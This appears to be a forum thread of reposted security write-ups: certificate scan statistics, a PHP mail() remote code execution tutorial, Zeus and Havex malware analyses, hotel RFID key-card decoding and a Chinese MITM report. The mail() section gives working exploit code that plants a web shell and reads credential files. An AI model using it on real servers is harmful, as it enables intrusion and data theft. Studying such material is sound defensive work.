We loaded approximately 150 scans into a Postgres database, resulting in over 65 million unique certificates, and started crunching the data. The first question, how many sites are affected, was relatively easy to answer. We searched the certificate chain of each of the roughly 20 million web sites we index for the SHA1 hashes listed in the blog post. After several minutes, Postgres listed 107,535 sites using a certificate signed by the soon-to-be untrusted CA certificates. That is a relatively large number of sites, representing roughly half a percent of all web sites in our database.

The next question was how long the certificates signed by these 1024-bit CA keys would remain in use. This proved informative and paints a clearer picture of the impact. We modified the first query to group the affected sites by certificate expiration date, rounded to the start of the month. The resulting data, shown in part in the graph below, makes it clear that the problem isn't nearly as bad as the initial numbers indicated: a great many of the certificates have already expired and the rest will do so over the next year. Surprisingly, over 13,000 web sites presented a certificate that expired in July of this year. Digging into these, we found that almost all had been issued to Vodafone and expired on July 1st; these expired certificates still appear to be in use today. The graph below demonstrates that the majority of affected certificates have already expired and that those which haven't are due to expire within the next year. We have excluded certificates that expired prior to 2013 for legibility.
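For readers who want to run a similar check against their own scan data, the chain test boils down to comparing SHA1 fingerprints. Here is a minimal sketch in Python rather than SQL; the entry in the blacklist set below is a made-up placeholder, and the real fingerprints are in the kuix.de post referenced above.

```python
import hashlib

# SHA1 fingerprints of the removed CA certificates would go here.
# This entry is a hypothetical placeholder, not a real fingerprint.
UNTRUSTED_SHA1 = {
    "d23209ad23d314232174e40d7f9d62139786633a",
}

def sha1_fingerprint(der_bytes):
    """Return the lowercase hex SHA1 fingerprint of a DER-encoded certificate."""
    return hashlib.sha1(der_bytes).hexdigest()

def chain_is_affected(chain_der):
    """True if any certificate in the chain matches an untrusted CA fingerprint."""
    return any(sha1_fingerprint(cert) in UNTRUSTED_SHA1 for cert in chain_der)
```

Feeding every chain from a scan through chain_is_affected() is the moral equivalent of the Postgres query described above.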
While Mozilla's decision will affect some sites, most of the active, affected sites present certificates that have already expired and shouldn't be trusted on that basis alone. In summary, the removal of trust for these certificates is a sound decision based on NIST recommendations, and while it initially appeared that a great many sites would be affected, the majority either have expired certificates or certificates that expire within the next year. We hope that Chrome and other browsers will also remove these certificates to eliminate the risk posed by these 1024-bit CA keys. Going forward, we are now tracking the certificates presented by SMTP, IMAP, and POP services, and will keep an eye on those as the data rolls in. If you still use a 1024-bit RSA key for any other purpose, such as Secure Shell (SSH) or PGP, it is past time to consider it obsolete and start rolling out stronger keys of at least 2048 bits, using ECC-based keys where available. - Labs

Sursa: https://community.rapid7.com/community/infosec/sonar/blog/2014/09/04/107000-web-sites-no-longer-trusted-by-mozilla
  19. Exploit PHP's mail() to get remote code execution
September 3, 2014

While searching around the web for new nifty tricks I stumbled across this post about how to get remote code execution by exploiting PHP's mail() function.

Update: After some further thinking and looking into this even more, I've found that my statement about this only being possible in really rare cases was wrong, since it can also be exploited in scenarios that are much more common than I first thought. So, instead of removing content, I added a strikethrough on the statements that are no longer valid, and updated with a second scenario explanation.

First, I must say that this is only going to happen under some really rare circumstances. Nevertheless, it's really something to think about and keep an eye out for. I will explain an example scenario which I think could be a real-life scenario later in this article.

So, with that said, let's have a look at what this is all about. When using PHP to send emails we can use PHP's built-in function mail(). This function takes a total of five parameters:

To
Subject
Message
Headers (optional)
Parameters (optional)

This looks pretty innocent at first glance, but used wrong it can be really bad. The parameter of interest is the fifth and last one, so let's have a look at what the PHP manual has to say about it:

"The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option."

This is really interesting. In short, it says that we can alter the behavior of the sendmail application.

Update: I should have added this from the beginning, but just to make this clear: the fifth argument is disabled when PHP is running in safe mode.

"mail() - In safe mode, the fifth parameter is disabled."
(note: only affected since PHP 4.2.3) Source: PHP: Functions restricted/disabled by safe mode - Manual

Now, let's have a look at the sendmail manual. I'm not going to post the entire manual here, but I will highlight some of the interesting parts.

Some interesting parameters:

-O option=value — Set option to the specified value. This form uses long names.
-Cfile — Use an alternate configuration file. Sendmail gives up any enhanced (set-user-ID or set-group-ID) privileges if an alternate configuration file is specified.
-X logfile — Log all traffic in and out of mailers in the indicated log file. This should only be used as a last resort for debugging mailer bugs. It will log a lot of data very quickly.

Some interesting options:

QueueDirectory=queuedir — Select the directory in which to queue messages.

So how can this be exploited?

Remote Code Execution

As stated above, this only occurs under very specific circumstances. For this to be exploitable, the user has to be able to control what goes into the fifth parameter, which sounds like something no developer would ever allow. But it's still something that really should be kept in mind. With that said, let's just dive into it!

This is the code for exploiting the mail() function:

$to = 'a@b.c';
$subject = '<?php system($_GET["cmd"]); ?>';
$message = '';
$headers = '';
$options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php';
mail($to, $subject, $message, $headers, $options);

Let's inspect the logs from this. First let's have a look at what we can see in the browser by going to the rce.php file:

11226 <<< To: a@b.c
11226 <<< Subject:
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<

Nothing really scary to see in this log. Now, let's use the cat command in the terminal on the same file:

> cat rce.php
11226 <<< To: a@b.c
11226 <<< Subject: <?php system($_GET["cmd"]); ?>
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<

See anything a bit more interesting?
Let's try to execute some commands. I visit http://localhost/rce.php?cmd=ls%20-la and get the following output:

11226 <<< To: a@b.c
11226 <<< Subject: total 20
drwxrwxrwx 2 *** *** 4096 Sep 3 01:25 .
drwxr-xr-x 4 *** www-data 4096 Sep 2 23:53 ..
-rw-r--r-- 1 *** *** 92 Sep 3 01:12 config.php
-rwxrwxrwx 1 *** *** 206 Sep 3 01:25 mailexploit.php
-rw-r--r-- 1 www-data www-data 176 Sep 3 01:27 rce.php
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<
11226 <<<
11226 <<<
11226 <<< [EOF]

Now, let me break it down in case you don't fully understand the code. The first four variables are pretty straightforward. We set the recipient email address to some bogus address, then in the subject we inject the PHP code that will execute our commands on the system, followed by an empty message and headers. The fifth variable is where the magic happens. The $options variable holds a string that will let us get remote code execution on the server. First we change the mail queue directory to /tmp using the -O argument with the QueueDirectory option; we want it there because it is globally writable. Second, the path and filename for the log is changed to /var/www/html/rce.php using the -X argument. Keep in mind that this path will not always be the same; you will have to craft it to fit the target's file system.

If we now point our browser at http://example.com/rce.php it will display the log for the attempted delivery. But since we added the PHP code to the $subject variable, we can now add the query ?cmd=[some command here], for example http://example.com/rce.php?cmd=cat%20/etc/passwd. If you want, you could also create a Local/Remote File Inclusion vulnerability instead: just change system() to include(). This can be handy if wget is not available, or you're not able to include a remote web shell.
It's also important to know that it's not only the subject field that can be used to inject arbitrary code: the content of all the fields, except the fifth, is written to the log.

Read files on the server

Another way to exploit this is to directly read files on the server. This can be done by using the -C argument as shown above. I have made a dummy configuration file just to show how it works:

$to = 'a@b.c';
$subject = '';
$message = '';
$headers = '';
$options = '-C/var/www/html/config.php -OQueueDirectory=/tmp -X/var/www/html/evil.php';
mail($to, $subject, $message, $headers, $options);

This creates a file named evil.php with the following content:

11124 >>> /var/www/html/config.php: line 1: unknown configuration line "<?php"
11124 >>> /var/www/html/config.php: line 3: unknown configuration line "dbuser = 'someuser';"
11124 >>> /var/www/html/config.php: line 4: unknown configuration line "dbpass = 'somepass';"
11124 >>> /var/www/html/config.php: line 5: unknown configuration line "dbhost = 'localhost';"
11124 >>> /var/www/html/config.php: line 6: unknown configuration line "dbname = 'mydb';"
11124 >>> No local mailer defined

Now we have managed to extract very sensitive data, and there's a lot more we can extract from the server.

A real-life scenario where this can become a reality

Scenario #1: Admin panel

To be honest I actually had to think about this for a while. I mean, who would be so stupid as to let their users control the sendmail parameters? Well, it really doesn't have to be that stupid. Consider the following scenario. You have an admin panel for your website. Like every other admin panel with respect for itself, it lets you set different settings for sending emails: stuff like port, SMTP server, etc. But not only that, this administration panel actually lets you monitor your mail logs, and you can decide where to store them.

Suddenly the idea of the fifth parameter's values being controlled by an end user doesn't sound so stupid anymore. You would of course not let this be modified from the contact form. But admins wouldn't hack their own site, would they? So in combination with other attacks that result in unauthorized access, this can become a real threat, since you can actually create vulnerabilities that were not originally in the application.

Scenario #2: Email service

The idea for this scenario spawned from the original post linked at the beginning of the article. Consider that we are running a website where a person can send an email to a recipient. In this case, the user must manually set the from address. Now, in the code we use the -f argument along with the user-supplied from address. If this from field is poorly validated and sanitized, the user can continue writing the required arguments and values directly.

How to detect a possible vulnerability

The fastest way to detect any possibility for this in code is to use grep and recursively look for any use of mail() with all five parameters in use. Position yourself in the root of whatever project you want to check and execute the following command, which will return all code lines that call mail() with five parameters:

grep -r -n --include "*.php" "mail(.*,.*,.*,.*,.*)" *

There will probably be some false positives, so if you have any suggestions to improve this and make it even more accurate, please let me know!

Summary

This is not something that you will stumble across often. To be honest I don't expect to ever see this in the wild at all, though it would be really cool to do so, but you never know, as explained in the "real-life scenario" section.
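As a side note on the grep-based detection described above: a rough script equivalent that walks a source tree might look like the sketch below. The regex is deliberately as naive as the grep pattern and is only illustrative; nested commas inside arguments will still cause misses and false positives.

```python
import os
import re

# Matches mail( ... , ... , ... , ... , ... ) -- five comma-separated arguments.
# Naive on purpose, just like the grep one-liner above.
FIVE_ARG_MAIL = re.compile(r"mail\s*\([^,;]*,[^,;]*,[^,;]*,[^,;]*,[^);]*\)")

def scan_tree(root):
    """Yield (path, line_number, line) for suspicious mail() calls in *.php files."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    if FIVE_ARG_MAIL.search(line):
                        yield path, lineno, line.rstrip()
```

Like the grep version, manual review of each hit is still needed to decide whether the fifth argument is actually user-controlled.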
Still, I do find this to be really interesting, and it makes you think “what other PHP functions can do this?” I hope you enjoyed the article and if you have any comments you know what to do Sursa: Exploit PHP’s mail() to get remote code execution | Security Sucks
  20. Yes. Well, the cases where you have access to someone's memory dump are pretty rare. If you had access to that computer you would already have access to all the files mounted with TrueCrypt.
  21. Thursday, September 4, 2014
Malware Using the Registry to Store a Zeus Configuration File

This blog was co-authored by Andrea Allievi. A few weeks ago I came across a sample that was reading from and writing a significant amount of data to the registry. Initially, it was thought that the file might be a binary, but after some analysis it was determined that it is a configuration file for Zeus. Within this blog post we take a look at our analysis of the data I/O in the registry.

Initial Stages of Infection

The scope of this paper is the analysis of the registry writes. This section is a brief overview of what happens when the malware is executed:

Unpacks
Creates a copy of itself in the tmp directory
Injects itself into explorer.exe
Starts a thread that executes the injected code

The code injected into explorer.exe becomes the focus of our analysis. To get started, an infinite loop was added to the entry point of the injected code and OllyDbg was used to attach to explorer.exe. Debugging injected code in this manner was previously covered here.

Analysis

After attaching the debugger and prior to continuing execution, a breakpoint is set on Advapi32.RegSetValueExW() before the large data write is made. This breakpoint is tripped multiple times by multiple threads within explorer.exe. Most of the time the threads are related to the injected ZBot code. It turns out that the same thread is used consistently for writing to this registry key. Several sub-keys are created to store data that the application uses at a later time. The names of the sub-keys are created using an index value that is combined with other data to appear random. For instance, the key "2f0e9h99" was created by combining a hash of the user SID with the index value 0x9A. Throughout this paper, the registry key will be referenced by either name or index.

A Series of Registry Writes

This section establishes a pattern to the registry activity that can be used to help figure out what the malware is accomplishing with the registry I/O. The registry activity centers around writing to the following key: HKUSERS\<sid>\Software\Microsoft\Ujquuvs. The "Ujquuvs" name is dynamically generated by the application and will change between executions.

[Figure: Ujquuvs registry key prior to the writes]

Prior to the first registry write of interest, the Ujquuvs sub-key contains the values shown in the above graphic. Throughout this section we'll see that new value names are generated and data is cycled between the keys. One of the first chunks written to the registry value 2f0e9h99 is a binary string 475 bytes in length. The following graphic shows the call to the Windows Advapi32.RegSetValueExW() procedure made by the malware.

[Figure: RegSetValueExW() stack]

[Figure: First registry write to 2f0e9h99]

The above graphic displays the binary string data that was written to the registry. Although 475 bytes is a significant chunk of data, it is not what caused an alarm; the registry write I am looking for is greater than 3000 bytes.

[Figure: Second registry write to 2f0e9h99]

Another 475-byte write occurs, but the data is different from the first write. It is worth noting that although the data differs, the first four bytes show the same "5D BB 95 50" pattern.
This may be a header used to distinguish the data. The next call to RegSetValueExW() writes 3800 bytes to the registry, with the binary data replaced by alphanumeric data (possibly Base64). Another assumption can be made: the original binary data is encoded and then stored back to the registry.

[Figure: Alphanumeric data written to 2f0e9h99]

This is one of the large data writes that was flagged by the sandbox. Continuing on, we see several more data writes, all of which are variations of the above. The data cycles between binary strings and alphanumeric strings, and the string lengths vary. One of the largest data writes was a 7200-byte alphanumeric string.

Registry Reads

Along with the registry writes there are usually corresponding registry reads. The data located in 2f0e9h99 is pulled into a buffer and manipulated by the application. Once the data is read, it is decoded from the alphanumeric encoding into a long list of 475-byte chunks of binary data. These chunks contain a hash used to identify specific chunks within the list. Whenever a new chunk of data is received, the data contained in 2f0e9h99 is decoded and the hash value of the received chunk is compared against each chunk that already exists within the registry. If the hash values match, that registry data chunk is replaced with the incoming data; otherwise the data is appended to the bottom of the list. Once the input queue is empty the calls to read or write to the registry stop. The thread has not been killed, but it is (most likely) suspended until some event occurs. The next section combines these findings with further analysis to track down the source of the registry writes.

ZBotThread_1 Procedure

Walking through the executable with a debugger led us to the source of the registry writes.

A thread is created and starts executing the code at address 0x41F579. From here on out this code is going to be referred to as ZBotThread_1(). This procedure is the backbone for all activity related to this registry key.

[Figure: Network socket loop]

After several instructions for initializing various data structures, ZBotThread_1() initializes a network socket to communicate with a remote server. Once traffic is received, the source IP address is checked against a blacklist of network address ranges that exists within a data structure used throughout the application. These IP address ranges appear to be owned by various AV vendors (indicated here). Here is the list of blacklisted address ranges with the corresponding netmasks:

64.88.164.160 255.255.255.224
64.233.160.0 255.255.224.0
65.52.0.0 255.252.0.0
66.148.64.0 255.255.192.0
84.74.14.0 255.255.255.0
91.103.64.0 255.255.252.0
91.200.104.0 255.255.255.0
91.212.143.0 255.255.255.0
91.212.136.0 255.255.255.0
116.222.85.0 255.255.252.0
128.130.0.0 255.254.0.0
131.107.0.0 255.255.0.0
150.26.0.0 255.255.255.0
193.71.68.0 255.255.255.0
193.175.86.0 255.255.255.0
194.94.127.0 255.255.255.0
195.74.76.0 255.255.255.0
195.164.0.0 255.255.0.0
195.168.53.48 255.255.0.0
195.169.125.0 255.255.255.0
204.8.152.0 255.255.248.0
207.46.130.0 255.255.0.0
208.118.60.0 255.255.240.0
212.5.80.0 255.255.255.192
212.67.88.64 255.255.224.0

Once the IP address is verified, the payload is decrypted and the data is initialized into the following data structure (sub_41F9C6):

[Figure: ZBOT_SOCKET_DATA structure]

Throughout this post we will refer to this as ZBOT_SOCKET_DATA. Each datagram payload contains this data structure.
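The netmask-based blacklist check described above is easy to reproduce. Here is a sketch using Python's ipaddress module with a few of the ranges from the list; this mirrors the observed behavior, not the malware's actual code.

```python
import ipaddress

# A few of the blacklisted (network, netmask) pairs from the sample, for illustration.
BLACKLIST = [
    ("65.52.0.0", "255.252.0.0"),
    ("131.107.0.0", "255.255.0.0"),
    ("207.46.130.0", "255.255.0.0"),
]

# strict=False masks off any host bits in the listed network address.
NETWORKS = [ipaddress.ip_network(f"{net}/{mask}", strict=False)
            for net, mask in BLACKLIST]

def is_blacklisted(ip):
    """Mimic the bot's check: drop traffic sourced from AV-owned address ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in network for network in NETWORKS)
```

A datagram whose source address falls inside any of these ranges would simply be ignored by the bot.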
The lpDataBuff member points to a buffer that contains the data that will eventually be written to the registry. In addition, dataBuffHeader[0x2C] contains the first 44 bytes of the decrypted received data. These bytes contain critical information about the entire data chunk. After a few checks to verify the integrity of the data, ZBotThread_1 calls AnalyseSockDataAndUpdateZBot (sub_43D305). This function takes the 20-byte hash contained in the data chunk header (the first 44 bytes) and compares it against a list of other hashes. This list of hashes is built out of previously received datagrams. If the hash is already in the list, the data is dropped; otherwise, the hash is appended to the end of the list. Next, AnalyseAndFinalizeSockData (sub_41D006) is called to begin the process of adding the data to the registry. Inside this function, the data type (dataBuffHeader+0x3) is checked. There are several different data types, but the one relevant for the purposes of this blog post is type 0x6. This signifies the end of the data stream, meaning the malware can proceed to save the data to registry key 2f0e9h99.

The type 0x6 code branch calls VerifyFinalSckDataAndWriteToReg (sub_436889). This function strips the 0x2C-byte header from the socket data before verifying the integrity using RSA1. Finally, if the data integrity is good, the WriteSckDataToReg function is called.

Writing Socket Data to the Registry

The previously received socket data has already been written to registry key 2f0e9h99. At this point, the new socket data needs to be merged with the data contained within the registry key. Before this can occur, the registry data, which is alphanumerically encoded (see the registry write section above), must be decoded. The decoded data is a series of 0x1D0-byte chunks, each of which is a ZBOT_SOCKET_DATA structure.
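The replace-or-append behavior described in the registry reads section can be modeled in a few lines. This is a simplified sketch: the identifying hash is extracted by a caller-supplied function rather than parsed out of the real 0x2C-byte header.

```python
def update_chunk_list(chunks, new_chunk, hash_of):
    """Replace the chunk with a matching identifier hash, else append.

    `chunks` is a list of raw chunk buffers; `hash_of` extracts the
    identifying hash from a chunk (in the malware this lives in the
    44-byte chunk header).
    """
    new_hash = hash_of(new_chunk)
    for i, chunk in enumerate(chunks):
        if hash_of(chunk) == new_hash:
            chunks[i] = new_chunk   # same identifier: overwrite in place
            return chunks
    chunks.append(new_chunk)        # unseen identifier: append to the list
    return chunks
```

Run over every incoming datagram, this keeps exactly one copy of each logical configuration chunk, which matches the update pattern observed in the registry.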
[Figure: Alphanumeric encoded data in memory]

The hash of the socket data is compared against the hash of each chunk contained within the list. If the hashes match, that registry data chunk is replaced with the network socket data; otherwise the network socket data is appended to the end of the list. Once the update is completed, the registry data is once again alphanumerically encoded and written back to the 2f0e9h99 registry key. It's worth noting that our sample dropper can encode the original data in several different ways: Base64 and three customized XOR algorithms (see the function at VA 0x4339DE for all the details).

Summary

Using the registry as a way to store and update a configuration is a clever idea, but the multiple writes and reads that come with constructing the file in a registry key will raise alarms; that is what originally grabbed our interest. This blog post covers a small percentage of the functionality of this malware sample. Some of the functionality we uncovered denotes a high level of sophistication by the author. We strongly encourage others to download a copy and crack open their debuggers.

Sample MD5 Hashes:
Dropper: DA91B56D5A85CAADDB00908220D62B92
Injected Code: B4A00F4C6F025C0BC12DE890A2C1742E

Written by Shaun Hurley at 1:00 PM

Sursa: VRT: Malware Using the Registry to Store a Zeus Configuration File
  22. RFID, when the manufacturer matters

Nowadays we can find RFID technology almost everywhere: in supermarkets (anti-theft), in assembly lines (identifying and tracking items), on highways (tolls), in public transportation, in your passport and your credit card, and it is also used by many companies and by hotels for access management. This post is about the latter.

Indeed, during my trips, whether for business or for holidays, I have stayed in many hotels. Some of them were still using good old keys like you do at home, most of them still use magnetic cards, and some rely on RFID cards to give you access to your room. Unfortunately, the security level of such RFID access management highly depends on the manufacturer, as we will see.

First, let's begin with the tools I use. I started messing with RFID more than a year ago and today I mostly rely on two tools:

A Proxmark3, which is a really awesome tool able to deal with low frequency tags (120-135 kHz) and high frequency tags (13.56 MHz), but it's pretty expensive, you have to handle external antennas, and it relies on a dedicated client
An OpenPCD 2, which only deals with a limited set of high frequency tags but is open source, credit-card sized, and natively supported by libnfc and related tools

So, basically, the Proxmark3 is useful when you are at home or at the office, and it is mandatory for specific RFID technologies, but usually, when I travel, I try to keep my hand luggage as light as possible. That's why I mostly rely on my Android tablet and why I avoid carrying specific cables (the Proxmark uses one between the main PCB and the antenna). To still be able to mess with the RFID/NFC technologies I might encounter while travelling, I cross-compiled a recent version of libnfc and mfoc to easily crack Mifare Classic keys. There is also a tool called mfcuk, but unfortunately that one has never worked for me so far... It only displays timing errors and never finishes.

By googling, I don't seem to be the only one encountering issues with it... I won't go into details about every kind of RFID tag you might encounter, but I am going to detail some of the NXP tags in their Mifare family, which still seems the most popular for 13.56 MHz tags:

Mifare Ultralight (64 bytes of memory divided into 16 pages of 4 bytes, almost no protection)
Mifare Classic (1KB or 4KB of memory, divided into blocks, with r/w protection relying on two 6-byte keys and a custom cryptographic algorithm called Crypto1, which is broken)
Mifare Plus (2KB or 4KB of memory, adds an AES-128 cipher to the Mifare Classic tag)
Mifare DESfire (2KB, 4KB or 8KB, uses the DES cipher)

All these cards have a read-only area at the beginning of the memory that has been set by the manufacturer. More details about the NXP Mifare family here. OK, enough "theory" for now.

So far, I have encountered two manufacturers of RFID key systems dedicated to hotels:

VingCard Elsafe, a Norwegian company
Kaba Ilco, a Swiss or German company

VingCard seems to be quite an old player in hotel locks, as I have already seen cards like these: They might ring a bell for those of my readers who began working with computers when punch cards were the only way to interface with a computer ;-)

But let's go back to recent wireless technologies. As far as I can tell, VingCard uses Mifare Ultralight tags for their locks. If you have read the last paragraphs carefully, you may remember that this particular kind of token lacks security measures: anybody can freely read the content (64 bytes of data). On the other side, Kaba uses Mifare Classic 1K cards for the customers' keys and Mifare Classic 4K for managers' keys (a sort of master key, required to program customers' keys). At least on those we find a bit of security. Unfortunately, Crypto1, NXP's cipher algorithm, is broken and you can recover all the keys in a matter of minutes (or sometimes only a few seconds) with the tools I mentioned (mfoc / mfcuk or Proxmark3).
My first goal in understanding how these keys work was to dump them several times, entering the room between dumping attempts, just to check whether a counter is stored in the card. At the least, I expected to find, maybe encoded in a weird way:

the room number
the start date of my stay
the duration of the stay

Also, to get extra dumps, I went back to the reception desk, asking them to program my key again because it was "not working anymore", or even asking for a new key because I seemed to have "lost" the first one (of course, I gave back both keys at checkout to avoid extra charges). Another thing to try when you have friends or family in the same hotel is to dump their keys too, especially if they are in the rooms next to yours (or at least on the same floor, in case the floor is also encoded in the card). This way I was able to bindiff the dumps and try to find useful stuff.

Let's begin with VingCard. Here is the result of running vbindiff against two different keys encoded for the same room: That's a lot of red! The first few bytes have to be different because they are the "unique ID" of the tag. But if we take a closer look at these dumps, we can see a pattern: one byte is repeated a lot in the red part of each dump. This value might be used to XOR the useful content. And the 4 final bytes might be a checksum value. Note also the constant 0x21 value across these dumps at offset 0x13. Surprisingly, it matches the length of the big red block... Let's try vbindiff again after XORing the 33-byte red memory block... That's definitely better! But we will have to find out later how this byte is computed... The next assumption we can make is for the three bytes located at 0x1F-0x21: at this particular hotel, I was given two room keys at once, so this might be the "key number" or something related.

Next step: compare keys encoded for two different rooms within the same hotel (after XORing their respective blocks, of course): Bingo! We still have the same differences we have seen before.
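If the repeated byte really is a single-byte XOR key over mostly-zero plaintext (an assumption on my part, not a confirmed fact about VingCard's format), recovering it is just a frequency count: the key byte appears wherever the plaintext is 0x00, so it dominates the byte histogram. A quick sketch:

```python
from collections import Counter

def guess_xor_key(block):
    """Guess a single-byte XOR key as the most frequent byte in the block.

    Assumes the underlying plaintext is mostly 0x00, so the key byte
    shows up more often than anything else.
    """
    key, _count = Counter(block).most_common(1)[0]
    return key

def xor_block(block, key):
    """XOR every byte of the block with the single-byte key."""
    return bytes(b ^ key for b in block)
```

Applied to the 33-byte red block, xor_block(block, guess_xor_key(block)) would reproduce the decoded dumps compared above.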
Apart from those, only two bytes have changed between the cards. They have to be the room number (or at least some sort of lock ID). Also, if you look carefully at the last two screenshots, you may notice that the byte at offset 0x1F has only 2 possible values so far: 0x42 or 0x82. As it was a short stay (1 night), I wasn’t able to dig deeper into those (trying to figure out the duration encoding and things like that). But remember, we still have to find out how the XOR key is computed and what kind of checksum is used. Well, for that part I may disappoint you, but no luck so far. If any of my readers have a clue, please leave it in the comments and I will test it against all the dumps I have.

At the beginning I was talking about comparing the badly designed VingCard RFID system against Kaba Ilco’s. Long story short, by applying exactly the same method, I can tell you that this one seems pretty good on several points:

- The Mifare Classic keys (A and B) seem to be derived from the UID of the tag, but despite a whole bunch of dumps I wasn’t able to find an obvious algorithm.
- While bindiff-ing two dumps, I always ended up with two completely different 16-byte blocks, even after having my key reprogrammed. The marketing brochures state that they use cryptography, so my guess would be that this is an encrypted block, depending on the Mifare Classic 4K tag (the manager key) that was used to program it. Moreover, the brochure also states that the cipher key is renewed every 30 days.

Going further on Kaba Ilco’s system would require using the proxmark3 to passively sniff the RFID exchanges between the tag and the lock. As a conclusion, we can say that every manufacturer states that its system is secure, but one should really ensure that it actually is, either by auditing the system oneself or by relying on a third party that can do that.

by Jean-Michel Picod

Sursa: A little bit of everything • RFID, when the manufacturer matters...
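The single-byte XOR and the checksum hunt described in this post are easy to script. A hedged sketch (the 33-byte block, the CRC-32/byte-sum candidates and all sample values are guesses for illustration, not the confirmed VingCard algorithm):

```python
import zlib
from collections import Counter

def recover_xor_key(block: bytes) -> int:
    """Guess a single-byte XOR key as the most frequent byte in the
    block: filler bytes (e.g. zeros) all collapse to the key itself."""
    return Counter(block).most_common(1)[0][0]

def unxor(block: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in block)

def checksum_matches(block: bytes, trailer: bytes):
    """Test a few common 4-byte checksums against the trailing bytes,
    in both byte orders."""
    candidates = {
        "crc32": zlib.crc32(block) & 0xFFFFFFFF,
        "sum32": sum(block) & 0xFFFFFFFF,
    }
    return [(name, order)
            for name, value in candidates.items()
            for order in ("big", "little")
            if value.to_bytes(4, order) == trailer]

# Toy 33-byte block: mostly zeros plus a fake room number, XORed with 0x5A.
plain = bytearray(33)
plain[0:2] = b"\x04\x12"                         # made-up "room number"
cipher = unxor(bytes(plain), 0x5A)
key = recover_xor_key(cipher)
trailer = zlib.crc32(cipher).to_bytes(4, "big")  # pretend checksum trailer
print(hex(key), unxor(cipher, key) == bytes(plain),
      checksum_matches(cipher, trailer))
```

In practice you would run checksum_matches over every dump’s block and its last 4 bytes; the author reports no match so far, so the real scheme is probably something less common than these candidates.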
23. [h=3]Volatility 2.4 at Blackhat Arsenal - Defeating Truecrypt Disk Encryption[/h]

This video shows how to use Volatility’s new Truecrypt plugins to defeat disk encryption on suspect computers running 64-bit Windows 8 and Server 2012. The video is narrated by Apple's text-to-speech engine, and you can find the actual text on the YouTube page. The live/in-person demo was given at the @Toolswatch Blackhat Arsenal.

Posted by Michael Hale Ligh at 10:08 AM

Sursa: Volatility Labs: Volatility 2.4 at Blackhat Arsenal - Defeating Truecrypt Disk Encryption
24. Analysis of Havex

Published on 2014-09-03 13:00:00.

Tools: IDA 6.6 demo, PE.explorer

Static analysis

Havex is a well-known RAT. Recently a new plugin appeared, and it targets ICS/SCADA systems. We found many different samples. Let’s start by looking at one.

MD5sum: 6bfc42f7cb1364ef0bfd749776ac6d38 6bfc42f7cb1364ef0bfd749776ac6d38
SHA1sum: db8ed2922ba5f81a4d25edb7331ea8c0f0f349ae 6bfc42f7cb1364ef0bfd749776ac6d38

All files are just simple Windows 32-bit DLLs, with no obfuscation, not packed. Nothing creepy! Take a look at the import table. It uses basic anti-debugging tricks (IsDebuggerPresent, GetTickCount…); no Winsock APIs are called. The most interesting part is the import table from MPR.dll. According to MSDN, the WNet* functions are used to enumerate network resources and connections. If we look at the Unicode strings, we clearly see something interesting. Looking at the strings’ references, we find a function that scans the LAN. Just after scanning the network comes another function that calls the WNetEnum* API functions we saw previously in the import table. And it calls WriteLogs, as I named it: it writes what it finds into a log file in the %TEMP% directory. After scanning the LAN, more interesting things happen. It is going to scan for OPC servers. But how can this be done? Look at the sub_100019E7 function: it starts by creating a thread. It launches COM API functions. Parameter Unk_10030C70 has the value 9DD0B56C-AD9E-43EE-8305-487F3188BF7A. It is used to get a list of servers (IID_IOPCServerList2). Clsid 6C0B50D-09D9-E0AD-0EE4-3835487F31880BF7A is used to retrieve the COM class factory for the component (CLSID_OPCServerList). It searches for OPC tags. Everything it finds is written to a file and sent to the C&C by the RAT.

Conclusion: This Havex plugin is not difficult to analyse and understand; it does not attack, but it is clearly designed to spy on industrial networks.
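The “Unicode strings” step above (Windows binaries keep their interesting strings as UTF-16LE) can be reproduced outside IDA. A small stdlib sketch, with a made-up blob and file name standing in for the real sample:

```python
import re

def unicode_strings(data: bytes, min_len: int = 5):
    """Extract printable UTF-16LE (Windows 'Unicode') strings from a
    binary blob, like the strings view used in the analysis above."""
    # An ASCII char followed by a NUL byte, repeated: the typical UTF-16LE
    # encoding of English text inside a Windows DLL.
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]

# Toy blob with a fabricated log path (not the actual Havex file name).
blob = b"\x90\x00\x12" + "%TEMP%\\scan.log".encode("utf-16-le") + b"\xff\x01"
print(unicode_strings(blob))
```

This mirrors what `strings -e l` does on the command line.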
References:

MSDN: WNetOpenEnum, WNetEnumResource, CoInitializeEx, CoCreateInstanceEx
Article: F-Secure

Sursa: https://www.malware.lu/articles/2014/09/03/analysis-of-havex.html
25. Analysis of Chinese MITM on Google

The Chinese are running a MITM attack on SSL-encrypted traffic between Chinese universities and Google. We have performed a technical analysis of the attack, on request from GreatFire.org, and can confirm that it is a real SSL MITM against Google and that it is being performed from within China.

We were contacted by GreatFire.org two days ago (September 3) with a request to analyze two packet captures from suspected MITM attacks before they finalized their blog post. The conclusions from our analysis are now published as part of GreatFire.org's great blog post titled “Authorities launch man-in-the-middle attack on Google”. In their blog post GreatFire.org write:

From August 28, 2014 reports appeared on Weibo and Google Plus that users in China trying to access google.com and google.com.hk via CERNET, the country’s education network, were receiving warning messages about invalid SSL certificates. The evidence, which we include later in this post, indicates that this was caused by a man-in-the-middle attack. While the authorities have been blocking access to most things Google since June 4th, they have kept their hands off of CERNET, China’s nationwide education and research network. However, in the lead up to the new school year, the Chinese authorities launched a man-in-the-middle (MITM) attack against Google.
Our network forensic analysis was performed by investigating the following two packet capture files:

[TABLE]
[TR]
[TH]Capture Location[/TH] [TH]Client Netname[/TH] [TH]Capture Date[/TH] [TH]Filename[/TH] [TH]MD5[/TH]
[/TR]
[TR]
[TD]Peking University[/TD] [TD]PKU6-CERNET2[/TD] [TD]Aug 30, 2014[/TD] [TD]google.com.pcap[/TD] [TD]aba4b35cb85ed218 7a8a7656cd670a93[/TD]
[/TR]
